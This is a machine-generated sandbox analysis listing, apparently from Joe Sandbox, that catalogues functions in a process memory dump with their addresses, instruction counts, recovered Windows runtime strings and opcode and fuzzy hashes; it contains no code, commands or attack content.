                                                                    Function 2906AEB0 Relevance: 2.6, Strings: 2, Instructions: 89COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • B5%r(, xrefs: 2906AF47, 2906AF6E
                                                                    • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 2906AF2F
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: B5%r($NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                    • API String ID: 0-671076713
                                                                    • Opcode ID: ac7a7e526c5eb35afcc9a1945d0afccd6b8ae6de7e5953a1a580594c37c8545a
                                                                    • Instruction ID: f2393b5a54a2f5ec198348d7fc968cf643ef0808359db2546b6803fbcac8e651
                                                                    • Opcode Fuzzy Hash: ac7a7e526c5eb35afcc9a1945d0afccd6b8ae6de7e5953a1a580594c37c8545a
                                                                    • Instruction Fuzzy Hash: 8C3126B2A0064CAFC700EF99CD44F5ABBF5FB48710F108965FA05A7650C738A942CBA1
                                                                    Function 28FD2FC8 Relevance: 1.7, Strings: 1, Instructions: 410COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: PATH
                                                                    • API String ID: 0-1036084923
                                                                    • Opcode ID: 1f5c850d66f8cb242e046279f28c1cc55ac8c01f78d27d7f20cbde41ab2e5f37
                                                                    • Instruction ID: dc8615f44946b8181e392d04c37ad8479e25aa598c9506b4f1d87649a8747c89
                                                                    • Opcode Fuzzy Hash: 1f5c850d66f8cb242e046279f28c1cc55ac8c01f78d27d7f20cbde41ab2e5f37
                                                                    • Instruction Fuzzy Hash: 4FF1B0B2D01259EBCB15CF98D880AAEB7F6FF48700F5D4029EB44AB350E7349951CBA4
                                                                    Function 2906CC20 Relevance: 1.6, Strings: 1, Instructions: 353COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: w
                                                                    • API String ID: 0-476252946
                                                                    • Opcode ID: 56391b22438d518148d0e76e749d4e186020b0884b48544dcbb806850cc612ba
                                                                    • Instruction ID: 2056627dc1a73dc24a57ea7d81a84d8a420b8afb4e8b244b28ace3994782f682
                                                                    • Opcode Fuzzy Hash: 56391b22438d518148d0e76e749d4e186020b0884b48544dcbb806850cc612ba
                                                                    • Instruction Fuzzy Hash: A0D19070900229EBDB18CF55C842ABEBBF1FF44704F14C86AE99997251E335EA93D790
                                                                    Function 29074C34 Relevance: 1.5, Strings: 1, Instructions: 271COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @
                                                                    • API String ID: 0-2766056989
                                                                    • Opcode ID: 89f527b55bfe7a4f0811dd71fcfc3e06bd55def568a9094adf0b6a96f076d154
                                                                    • Instruction ID: 506756b199ea74c6c474ba8a53bb6a7e22bb7a80d39f7ab7e171aeaa1df8cde0
                                                                    • Opcode Fuzzy Hash: 89f527b55bfe7a4f0811dd71fcfc3e06bd55def568a9094adf0b6a96f076d154
                                                                    • Instruction Fuzzy Hash: 81A12C75E0130DEFDB05CF98C880AEEB7FAEF18750F144829EA19A7251E7749942CB54
                                                                    Function 290A2B57 Relevance: 1.5, Strings: 1, Instructions: 266COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 2+)
                                                                    • API String ID: 0-4146280145
                                                                    • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                    • Instruction ID: 909f2279614f9bcc3a7b469e4c30d41c8ff1aaeb24a46047ee1d9d21d2d1d2d3
                                                                    • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                    • Instruction Fuzzy Hash: 64B11871E0061ADFDB18CFADC880A9DB7F5BF48350F24857AEA14AB355D730A942CB90
                                                                    Function 2907E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID: 0-3916222277
                                                                    • Opcode ID: 886a84a3437624daa4cb774f6ac5c6cf3fbeb4a16389e6f0ed6618716f5c91e7
                                                                    • Instruction ID: 42404908bc1abc89a70bc4890fc7a19dfcd536dae60d64f4257a1bba47394490
                                                                    • Opcode Fuzzy Hash: 886a84a3437624daa4cb774f6ac5c6cf3fbeb4a16389e6f0ed6618716f5c91e7
                                                                    • Instruction Fuzzy Hash: 4891B17190264CBADB169FA0DC44FDFBBBAEF55760F100825F504AB260EB359903CBA5
                                                                    Function 2900CDB1 Relevance: 1.4, Strings: 1, Instructions: 197COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: B5%r(
                                                                    • API String ID: 0-903791394
                                                                    • Opcode ID: e1803e1a4a0232130f74c14ae9a83781d99a309db5dfa9f34a2811c85f24c209
                                                                    • Instruction ID: 8a840e0b81e0b7b7f482c92d43eadb68695e8258d19d8f70c9150f74066abf29
                                                                    • Opcode Fuzzy Hash: e1803e1a4a0232130f74c14ae9a83781d99a309db5dfa9f34a2811c85f24c209
                                                                    • Instruction Fuzzy Hash: 6F61D171E00249DFEB08DF68C891AAEB7F5BF08350F10997AEA15EB291D7709902CB54
                                                                    Function 29074978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .mui
                                                                    • API String ID: 0-1199573805
                                                                    • Opcode ID: c4d40e592bdee03b3bc561b5e05cdb812f8a2a9b8887793896bd4c25c60957be
                                                                    • Instruction ID: 2e0c8ba4b957ee30fc177fe9fed15ffd1ef220284eb56c40dc0f8102e9a0ceee
                                                                    • Opcode Fuzzy Hash: c4d40e592bdee03b3bc561b5e05cdb812f8a2a9b8887793896bd4c25c60957be
                                                                    • Instruction Fuzzy Hash: FA517672D0132DABCB04CF99D880EEEB7B6EF14760F054569E915B7250E7349D02CBA8
                                                                    Function 28FCCDEA Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: AlternateCodePage
                                                                    • API String ID: 0-3889302423
                                                                    • Opcode ID: a60b9d8b7ff8844380ac920d11caf27548a1fe1638713006beb25d7a50e237a0
                                                                    • Instruction ID: ae48d68f72d6529c3ec7e61c15ab2fe604fb469b8fb5d2f37fbff30a58402984
                                                                    • Opcode Fuzzy Hash: a60b9d8b7ff8844380ac920d11caf27548a1fe1638713006beb25d7a50e237a0
                                                                    • Instruction Fuzzy Hash: 3941E176D01619AAEF18CF99C880AEFB7F9FF85310F10456AE515E7290EB349B42CB50
                                                                    Function 2904CCA0 Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: TrustedInstaller
                                                                    • API String ID: 0-565535830
                                                                    • Opcode ID: c4ee5bd1d4528a7333c1547e8068564cad08106c0b48b091b1b88a0e97d794bd
                                                                    • Instruction ID: 2d7c802eceedad1ac783ec3b6a23225c8078c4fb86098a15b20e0422c1d526a2
                                                                    • Opcode Fuzzy Hash: c4ee5bd1d4528a7333c1547e8068564cad08106c0b48b091b1b88a0e97d794bd
                                                                    • Instruction Fuzzy Hash: 13319E76941629BADB16DB94CC41FEEBBB9EF54740F010476FA00AB160E6319E42CBA0
                                                                    Function 29066B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #
                                                                    • API String ID: 0-1885708031
                                                                    • Opcode ID: 24578117c17ab4bd31016e7a674aa69052c4abe308eb44bd12098ac8d0594eb4
                                                                    • Instruction ID: ed02876e3c203ddd6602ca918fa1d70d4e7d7190281b8f7cb524059a19ddfaf4
                                                                    • Opcode Fuzzy Hash: 24578117c17ab4bd31016e7a674aa69052c4abe308eb44bd12098ac8d0594eb4
                                                                    • Instruction Fuzzy Hash: E9314831600B0C9BD726CFA5C850BEE77F8DF44314F104479E945AB2A2DB76E906CB90
                                                                    Function 29070F50 Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @
                                                                    • API String ID: 0-2766056989
                                                                    • Opcode ID: 82e9b14cf91a5a6f37c9e4009f2ae5fbb7a03b243ebd8f8edba72d545418d4d2
                                                                    • Instruction ID: 813a100c3f481b46f4a495c1ad1adcd61fee96c19b322426a9ef2e73cab83a6c
                                                                    • Opcode Fuzzy Hash: 82e9b14cf91a5a6f37c9e4009f2ae5fbb7a03b243ebd8f8edba72d545418d4d2
                                                                    • Instruction Fuzzy Hash: D1314B71118389AFD355CF14C849E9BBBF8EF94760F404E2EB59487190E7B0D909CB96
                                                                    Function 2904CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: BinaryName
                                                                    • API String ID: 0-215506332
                                                                    • Opcode ID: e8dfc881d3cc12fbcd16583b240a6526d1f71887e6e05bb35b85a8a984c689c5
                                                                    • Instruction ID: 4bbafdc99396d0214768ab47531e339e42dd8f5ac63c3389abd56c6183e8e2ad
                                                                    • Opcode Fuzzy Hash: e8dfc881d3cc12fbcd16583b240a6526d1f71887e6e05bb35b85a8a984c689c5
                                                                    • Instruction Fuzzy Hash: 1631F136D01529AFDB09CA59C845EAFB7B6EF80760F018979A914A7251D7309E02CBE0
                                                                    Function 28FF8CB1 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: WindowsExcludedProcs
                                                                    • API String ID: 0-3583428290
                                                                    • Opcode ID: 34a5547e051765790c2c8ceff76a078c61e809f66b40f98c98d16d0ff40d25f6
                                                                    • Instruction ID: db768cb303bef29faa903beae6e06c23747f0ac0aaf32f6d659a38f097a52b86
                                                                    • Opcode Fuzzy Hash: 34a5547e051765790c2c8ceff76a078c61e809f66b40f98c98d16d0ff40d25f6
                                                                    • Instruction Fuzzy Hash: 2A213437612118BBCB128A58C884F4F77BEAF71AA0F254476BA089F564C630CD0287A0
                                                                    Function 2905892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 2905895E
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                    • API String ID: 0-702105204
                                                                    • Opcode ID: 9195c8406c5dbe75beb138c4aec59b3138afd1bd0a376d4a81feadd124000b0c
                                                                    • Instruction ID: 330a050ed6b2e1134829d028f9acf500c427c46bd94d74d7231a0bb8682e333d
                                                                    • Opcode Fuzzy Hash: 9195c8406c5dbe75beb138c4aec59b3138afd1bd0a376d4a81feadd124000b0c
                                                                    • Instruction Fuzzy Hash: 3401A73A20525CAFD71C5B51DCC4F6E77E5FF96290B481C28EF4217559CB206C43C69A
                                                                    Function 29086FF7 Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • Critical error detected %lx, xrefs: 29087027
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Critical error detected %lx
                                                                    • API String ID: 0-802127002
                                                                    • Opcode ID: 62712123fc2b006b53b3b7779353b5e86ca7f17872f5ce5d0be363e33de0df15
                                                                    • Instruction ID: dbf6f15d71ecd59e25fa0cf3196794e38b93a97dfcabc8c6a38d9cf564e511d1
                                                                    • Opcode Fuzzy Hash: 62712123fc2b006b53b3b7779353b5e86ca7f17872f5ce5d0be363e33de0df15
                                                                    • Instruction Fuzzy Hash: A7112776E1434CDADB25CFA4D941B9DBBB1FB04318F20892AD155AB282D7756602CF14
                                                                    Function 29072000 Relevance: .8, Instructions: 757COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2a361f97b7b321a42f401702266d4a1bef1f156bc0ef734a93c9fe3ca8d2319d
                                                                    • Instruction ID: ea035c6108b3e35754eab719b57ba2f7b330e135debe4a17c34a4cb9ab4379e1
                                                                    • Opcode Fuzzy Hash: 2a361f97b7b321a42f401702266d4a1bef1f156bc0ef734a93c9fe3ca8d2319d
                                                                    • Instruction Fuzzy Hash: 1542CC326093499BD719CF68C880AABB7F5BF9C360F044D3EFA8587260D631D946CB56
                                                                    Function 29068158 Relevance: .6, Instructions: 617COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d4165a3ecd5f21a96eec7d59d8e7d5a7912cf1d6519cca48d14adf527759b6fe
                                                                    • Instruction ID: b1bb36914abfafb370144db58c2d8b15548aee911069065bde8aae78a6dd7211
                                                                    • Opcode Fuzzy Hash: d4165a3ecd5f21a96eec7d59d8e7d5a7912cf1d6519cca48d14adf527759b6fe
                                                                    • Instruction Fuzzy Hash: FC426F75E102199FDB28CF69C881BADB7F6BF48300F1484AAE949EB251E7349D81CF54
                                                                    Function 28FE2840 Relevance: .6, Instructions: 605COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 718c16a73ccd6df6e525b75f9369bbd6c656764337d904a692b77736400236a6
                                                                    • Instruction ID: b52386e844ead609a54ebacb1f7f1494eece41a7b507c51c9f2a3df7c93c2696
                                                                    • Opcode Fuzzy Hash: 718c16a73ccd6df6e525b75f9369bbd6c656764337d904a692b77736400236a6
                                                                    • Instruction Fuzzy Hash: 39322570A0075D9FDB18CFA5C845BAEB7F2BF84744F608A2EE4499B280D735A943CB54
                                                                    Function 2907A118 Relevance: .6, Instructions: 591COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0c8471e72a80eb61f7a7d9dc446c24e22a932349100f333d6b631e11d6540ff4
                                                                    • Instruction ID: 2153b057018b5fffd563500dd43d38d27858b6e60c49c26cfc679a059d666d23
                                                                    • Opcode Fuzzy Hash: 0c8471e72a80eb61f7a7d9dc446c24e22a932349100f333d6b631e11d6540ff4
                                                                    • Instruction Fuzzy Hash: C922C1706047599FD718CF2AC8907B6B7F1AF44360F048C6AE9868F286D335E593DB68
                                                                    Function 28FF8DBF Relevance: .6, Instructions: 554COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c5bdeb481894f69b968f94e5f39bc88fed56373fda8f9c5e00a0520b9c29722b
                                                                    • Instruction ID: 70b14b44723731d747fe53ae1dfa26c44dcec300a468c6ae817d9312eadcfda6
                                                                    • Opcode Fuzzy Hash: c5bdeb481894f69b968f94e5f39bc88fed56373fda8f9c5e00a0520b9c29722b
                                                                    • Instruction Fuzzy Hash: A3225170E0111ADFCB08CF95C4809BEFBF2BF58704B64846AE9459B291E734DE42DB64
                                                                    Function 28FD6A50 Relevance: .5, Instructions: 548COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9c9cdccbee268412ac353131b164a2a03f773d7e0120b47973993c54d51193e6
                                                                    • Instruction ID: d3143489c70fadfade99267298e3114eff56b3829d2bf8278fd285b2fb26a4e3
                                                                    • Opcode Fuzzy Hash: 9c9cdccbee268412ac353131b164a2a03f773d7e0120b47973993c54d51193e6
                                                                    • Instruction Fuzzy Hash: 0B327E76A05209DFCB54CF68C480B9EB7F2FF48310F14896AEA55AB352D734E942CB94
                                                                    Function 28FF4A35 Relevance: .4, Instructions: 423COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                    • Instruction ID: e004e6f9cf4fd9838346ab9106a58747c12127b669e9dfd1696ea610195b9007
                                                                    • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                    • Instruction Fuzzy Hash: F6F18E71E022099BDB18CF95C580BAEB7F6BF68714F048579E904EB3A1E774D942CB60
                                                                    Function 2906892B Relevance: .4, Instructions: 386COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8912978d85487bb4b66011a3e44eb8897c8f0771318dc605ff915184e53de34d
                                                                    • Instruction ID: e8093e42acbf4520e639b843a67c06af01e66d2706e6833ed86cbb4de9ae3321
                                                                    • Opcode Fuzzy Hash: 8912978d85487bb4b66011a3e44eb8897c8f0771318dc605ff915184e53de34d
                                                                    • Instruction Fuzzy Hash: D7D10471A0060D9BDB08CF58C841AEEB7F2AF88354F18896ADD55E7251E735EA02CF64
                                                                    Function 28FC8397 Relevance: .4, Instructions: 380COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bd29429688b6ef2761a31bed68d3bc2a997f3ce0f3d5170324da097430337867
                                                                    • Instruction ID: 53aa23c21bad3b89347ed20c6e4ac21d8dc8ce1b3d114a29f443994f61db149f
                                                                    • Opcode Fuzzy Hash: bd29429688b6ef2761a31bed68d3bc2a997f3ce0f3d5170324da097430337867
                                                                    • Instruction Fuzzy Hash: 1ED1D276A1161BDBCB08CF64C880EAE77E6BF55714F188A2DE915DB280F734DA41CB50
                                                                    Function 29066E20 Relevance: .4, Instructions: 379COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: acd44b7bfe40d4f1d33665fd0154953b01a185c2935f3da3fd0ee4f4f90d8a14
                                                                    • Instruction ID: 6a37b42bb9573d7b760fcf18f735586aadab7ad3b7dd3150bc5b6d6b4e547085
                                                                    • Opcode Fuzzy Hash: acd44b7bfe40d4f1d33665fd0154953b01a185c2935f3da3fd0ee4f4f90d8a14
                                                                    • Instruction Fuzzy Hash: 56E11E70D0025EDBCB04CFA8C591AAEBBF5BF49344F14856AE844EB251E335E946CBA0
                                                                    Function 28FFEF28 Relevance: .3, Instructions: 347COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: aeddd23c8d7d39f7a868015bf4381555b6f3b3dceb9ad79b1bfb68ff701e2686
                                                                    • Instruction ID: 3ca462a425c5e6d28e926d462a63db32851cc6154397a5fcc96f9911c79290c6
                                                                    • Opcode Fuzzy Hash: aeddd23c8d7d39f7a868015bf4381555b6f3b3dceb9ad79b1bfb68ff701e2686
                                                                    • Instruction Fuzzy Hash: E6E143B5D01608DFCB25CFA9C980A8DFBF2FF58310F25456AE946A76A1DB70A941CF10
                                                                    Function 29058243 Relevance: .3, Instructions: 322COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                    • Instruction ID: 396372589b845181311637a5498238a408e717dfceb6f1fc1d7424019b8816e1
                                                                    • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                    • Instruction Fuzzy Hash: C8B13274A0060CAFDB18DB55C940EABBBF9FF84344F508869AE43D7691DA34E947CB18
                                                                    Function 28FF0DE1 Relevance: .3, Instructions: 295COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0195054aa03b9fa4a8d915654939c483bbcbf4c219c5059d48ba6d9129f2223b
                                                                    • Instruction ID: 4e19e7a0f435ba2c1993f61b7efe6b8c285dbdb3c50f8dcebc9927242db8fecb
                                                                    • Opcode Fuzzy Hash: 0195054aa03b9fa4a8d915654939c483bbcbf4c219c5059d48ba6d9129f2223b
                                                                    • Instruction Fuzzy Hash: C5C19D75E0124DDFDB18CF99C980A9EBBB6FFA8304F104139E505AB695E731A942CF80
                                                                    Function 28FD83C0 Relevance: .3, Instructions: 281COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
